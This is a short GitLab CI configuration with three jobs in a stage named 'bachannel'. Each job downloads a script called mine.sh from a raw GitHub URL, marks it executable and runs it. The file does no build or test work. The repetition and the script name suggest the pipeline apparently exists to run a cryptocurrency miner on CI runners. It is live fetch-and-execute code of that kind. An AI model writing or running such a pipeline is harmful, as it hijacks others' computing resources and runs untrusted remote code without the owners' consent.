bachannel_1:
    stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/AllFactzoAfz/gitlab/main/mine.sh && chmod u+x mine.sh && ./mine.sh
bachannel_2:
    stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/AllFactzoAfz/gitlab/main/mine.sh && chmod u+x mine.sh && ./mine.sh
bachannel_3:
    stage: bachannel
    script:
        -wget https://raw.githubusercontent.com/AllFactzoAfz/gitlab/main/mine.sh && chmod u+x mine.sh && ./mine.sh

